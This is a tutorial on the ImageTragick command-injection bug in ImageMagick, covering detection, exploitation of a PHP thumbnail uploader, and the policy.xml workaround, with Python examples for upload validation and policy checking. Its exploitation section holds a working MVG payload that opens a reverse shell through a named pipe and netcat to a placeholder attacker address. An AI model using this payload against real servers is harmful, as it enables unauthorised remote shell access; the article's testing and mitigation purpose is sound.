
Exploiting ImageTragick 2023

This article explains the ImageTragick bug (CVE-2016-3714) in ImageMagick and how to find, exploit and fix it.

Overview


In May 2016, security researchers Nikolay Ermishkin and Stewie disclosed several vulnerabilities in ImageMagick, an open-source image-processing suite. ImageMagick is used, directly or through bindings such as PHP's Imagick, by a wide range of applications for tasks from image resizing to conversion between formats.

The command-injection bug covered here affects ImageMagick versions before 6.9.3-10 (6.9.3-9 shipped an incomplete fix; 7.0.1-1 is the corresponding fix in the 7.x line). It occurs because an insufficiently filtered file name is substituted into a delegate command that ImageMagick runs through the system shell. As the initial proof of concept showed, it is very easy to exploit. In this article we look at how to test for and fix this vulnerability.


Am I vulnerable?


Follow these steps to check whether the installed version is vulnerable:

Step 1: Save the following MVG (Magick Vector Graphics) text into a file named exploit.mvg. This is the original proof of concept; the quotes must be plain ASCII quotes, and the second line is the viewbox directive.

push graphic-context
viewbox 0 0 640 480
fill 'url(https://127.0.0.1/oops.jpg"|ls "-la)'
pop graphic-context

Step 2: Convert exploit.mvg to exploit.png with the following command.

convert exploit.mvg exploit.png

If the installed version is vulnerable, ImageMagick runs "ls -la" and the listing of the current directory appears on the console.

The fill url() on the third line points at an https: resource. ImageMagick has no built-in HTTPS client; it hands such URLs to an external delegate defined in delegates.xml, which fetches the file with curl through a system() call. The file name is substituted into that command line without escaping, so the double quote in the payload closes curl's URL argument, the pipe character starts a second shell command, and "ls -la" runs with the privileges of the ImageMagick process.
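To make the mechanism concrete, here is an added example (this is not code from the article or from ImageMagick) that models the unsafe substitution. HTTPS_DELEGATE approximates the https entry in delegates.xml, and the %M/%o placeholders, the stripped file name and the "safe" variant are this example's own assumptions, not ImageMagick's actual patch. It tokenises the expanded string the way a POSIX shell would and shows that the payload becomes two separate commands.

```python
import shlex
from typing import List

# Approximation of the https delegate in ImageMagick's delegates.xml: curl
# fetches the URL into a temporary output file. Exact flags are assumed.
HTTPS_DELEGATE = '"curl" -s -k -o "%o" "https:%M"'

# Constructed input: the file name ImageMagick is left with after stripping
# the https: prefix from url(https://127.0.0.1/oops.jpg"|ls "-la).
PAYLOAD_NAME = '//127.0.0.1/oops.jpg"|ls "-la'


def expand_delegate_unsafe(template: str, input_name: str, output_name: str) -> str:
    """Pre-fix behaviour: plain textual substitution, result handed to the
    shell as one string. Nothing in input_name is escaped, so quotes and a
    pipe inside it become shell syntax."""
    return template.replace("%o", output_name).replace("%M", input_name)


def shell_tokens(command: str) -> List[str]:
    """Tokenise like a POSIX shell, emitting | ; & < > as separate operator
    tokens (shlex punctuation_chars, available since Python 3.6)."""
    lex = shlex.shlex(command, posix=True, punctuation_chars=True)
    return list(lex)


def split_commands(tokens: List[str]) -> List[List[str]]:
    """Group tokens into the simple commands the shell would actually run;
    redirection tokens stay with their command."""
    commands: List[List[str]] = []
    current: List[str] = []
    for tok in tokens:
        if tok in ("|", ";", "&", "||", "&&"):
            if current:
                commands.append(current)
            current = []
        else:
            current.append(tok)
    if current:
        commands.append(current)
    return commands


def expand_delegate_safe(input_name: str, output_name: str) -> List[str]:
    """One hardened alternative (illustration only): build argv directly and
    run it with subprocess.run(argv) and no shell, so the file name is always
    exactly one argument however many quotes or pipes it contains."""
    return ["curl", "-s", "-k", "-o", output_name, "https:" + input_name]


if __name__ == "__main__":
    cmd = expand_delegate_unsafe(HTTPS_DELEGATE, PAYLOAD_NAME, "/tmp/magick-out")
    print("shell receives:", cmd)
    for argv in split_commands(shell_tokens(cmd)):
        print("  runs:", argv)
    print("argv without a shell:", expand_delegate_safe(PAYLOAD_NAME, "/tmp/magick-out"))
```

The same tokeniser handles the ';' separators used in the reverse-shell payload later in the article, which the shell would split into five commands (curl, mknod, /bin/sh, nc, rm).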

Exploitation


To exploit this vulnerability, I created a simple PHP file uploader that accepts any uploaded image and uses ImageMagick to create a thumbnail of it.

NOTE: No matter how secure your file uploader is, if it uses a vulnerable version of ImageMagick you are still at risk. Extension and MIME-type checks do not help, because ImageMagick detects the format from the file content: a file named image.png whose body is MVG text is parsed as MVG.
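Because the format is sniffed from content, the upload side should do the same sniffing itself and reject anything that is not a genuine raster image before ImageMagick ever sees it. The following is an added example, not code from the article's uploader: the PNG, JPEG and GIF signatures are the real magic bytes, while the function names, the extension allowlist and the sample inputs are constructed for this example.

```python
from typing import Optional, Tuple

# Real file signatures for the raster formats the uploader is willing to accept.
RASTER_SIGNATURES = {
    b"\x89PNG\r\n\x1a\n": "png",
    b"\xff\xd8\xff": "jpeg",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}

# Extension allowlist for this example; anything else is rejected outright.
EXTENSION_TO_FORMAT = {"png": "png", "jpg": "jpeg", "jpeg": "jpeg", "gif": "gif"}


def sniff_raster_format(data: bytes) -> Optional[str]:
    """Return the format implied by the leading bytes, or None if unknown."""
    for signature, fmt in RASTER_SIGNATURES.items():
        if data.startswith(signature):
            return fmt
    return None


def looks_like_text_coder_input(data: bytes) -> bool:
    """Spot the text-based ImageMagick inputs used by the ImageTragick
    payloads: MVG ('push graphic-context'), MSL (XML) and anything that
    carries a url() reference, which is what triggers the delegate."""
    head = data[:4096].lower()
    return (b"push graphic-context" in head
            or b"<?xml" in head
            or b"url(" in head)


def validate_upload(data: bytes, filename: str) -> Tuple[bool, str]:
    """Accept only when the extension is allowlisted, the body is not a
    text-based coder format, and the magic bytes match the extension."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    expected = EXTENSION_TO_FORMAT.get(ext)
    if expected is None:
        return False, "extension not in allowlist"
    if looks_like_text_coder_input(data):
        return False, "content looks like a text-based ImageMagick format"
    actual = sniff_raster_format(data)
    if actual is None:
        return False, "no recognised raster signature"
    if actual != expected:
        return False, "content is %s but name claims %s" % (actual, expected)
    return True, actual


# Constructed sample inputs (not real uploads): the article's MVG probe saved
# under a .png name, and the first bytes of a PNG (signature plus the start of
# an IHDR chunk; not a complete image).
MVG_DISGUISED_AS_PNG = (
    b"push graphic-context\n"
    b"viewbox 0 0 640 480\n"
    b"fill 'url(https://127.0.0.1/oops.jpg\"|ls \"-la)'\n"
    b"pop graphic-context\n"
)
REAL_PNG_HEAD = b"\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR" + bytes(17)

if __name__ == "__main__":
    print(validate_upload(MVG_DISGUISED_AS_PNG, "exploit.png"))
    print(validate_upload(REAL_PNG_HEAD, "photo.png"))
```

When the file is then passed to ImageMagick, giving the coder explicitly (for example convert png:upload.png thumb.png) tells ImageMagick to use that coder instead of sniffing the content, which is a second, independent guard against a disguised MVG or MSL file.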

Now create a file with a .png extension whose content is the following MVG text, and upload it to the server. Replace ATTACKER_IP and PORT with the address and port of your listener; those values are placeholders here.

push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg"|mknod /tmp/pipez p;/bin/sh 0</tmp/pipez | nc ATTACKER_IP PORT 1>/tmp/pipez;rm -rf "/tmp/pipez)'
pop graphic-context

The target in this case has the traditional netcat package, which lacks the -e option for spawning a shell directly, so the payload uses a named pipe (mknod /tmp/pipez p) to wire the shell to the connection: /bin/sh reads its commands from the pipe, its output is piped into nc and sent to the attacker, and whatever nc receives is written back into the pipe for the shell to execute.

First, start a listener (ncat in our case) on the attacker's Kali machine on the port used in the payload.

As soon as the upload button is pressed, the server hands the file to ImageMagick to build the thumbnail, the payload is triggered, and the listener receives a reverse shell.

How to fix it?

For installations that cannot be updated immediately, the ImageMagick team published a workaround that disables the affected coders through policy.xml (on Debian and Ubuntu the file is /etc/ImageMagick-6/policy.xml; "convert -list policy" prints the policy actually in effect). Upgrading to 6.9.3-10 / 7.0.1-1 or later remains the proper fix, since the policy only blocks the known vectors. ImageTragick.com reproduces the recommended entries, which go inside the <policymap> element:

<policy domain="coder" rights="none" pattern="EPHEMERAL" />
<policy domain="coder" rights="none" pattern="URL" />
<policy domain="coder" rights="none" pattern="HTTPS" />
<policy domain="coder" rights="none" pattern="MVG" />
<policy domain="coder" rights="none" pattern="MSL" />
<policy domain="coder" rights="none" pattern="TEXT" />
<policy domain="coder" rights="none" pattern="SHOW" />
<policy domain="coder" rights="none" pattern="WIN" />
<policy domain="coder" rights="none" pattern="PLT" />

The URL entry, which is part of the upstream list, covers the plain http:// form of the same payload; the quotes must be plain ASCII quotes or the file will not parse.
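Checking a server's policy.xml by eye is error-prone, so here is an added example (not from the article or the ImageMagick project) that parses a policy file and reports which of the coders in the ImageTragick workaround are still enabled. The coder list matches the workaround published on ImageTragick.com (the entries above plus URL); the sample policy is constructed and deliberately incomplete.

```python
import sys
import xml.etree.ElementTree as ET
from typing import Set

# Coders disabled by the ImageTragick workaround (ImageTragick.com list).
IMAGETRAGICK_CODERS = {"EPHEMERAL", "URL", "HTTPS", "MVG", "MSL", "TEXT", "SHOW", "WIN", "PLT"}


def disabled_coders(policy_xml: str) -> Set[str]:
    """Collect the patterns of every <policy domain="coder" rights="none">
    entry. Patterns are upper-cased because ImageMagick coder names are
    conventionally written that way in policy.xml."""
    root = ET.fromstring(policy_xml)
    disabled: Set[str] = set()
    for policy in root.iter("policy"):
        if (policy.get("domain", "").lower() == "coder"
                and policy.get("rights", "").lower() == "none"):
            disabled.add(policy.get("pattern", "").upper())
    return disabled


def missing_imagetragick_policies(policy_xml: str) -> Set[str]:
    """Return the coders from the workaround that the policy does not disable.
    A coder-domain entry with pattern="*" disables every coder, so nothing is
    missing in that case."""
    disabled = disabled_coders(policy_xml)
    if "*" in disabled:
        return set()
    return IMAGETRAGICK_CODERS - disabled


# Constructed sample: a policy.xml that applied only part of the workaround.
SAMPLE_POLICY = """<policymap>
  <policy domain="resource" name="memory" value="256MiB"/>
  <policy domain="coder" rights="none" pattern="EPHEMERAL" />
  <policy domain="coder" rights="none" pattern="HTTPS" />
  <policy domain="coder" rights="none" pattern="MVG" />
  <policy domain="coder" rights="none" pattern="MSL" />
</policymap>
"""

if __name__ == "__main__":
    # Usage: python check_policy.py /etc/ImageMagick-6/policy.xml
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_POLICY
    missing = missing_imagetragick_policies(text)
    print("still enabled:", sorted(missing) if missing else "none")
```

Run it against the policy file that "convert -list policy" reports as the one in use; a policy.xml edited in the wrong directory is a common reason the workaround appears not to take effect.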

With those entries in place, ImageMagick refuses to read the file: convert fails with a "not authorized" error when given the malicious MVG, and no command is executed on the system.
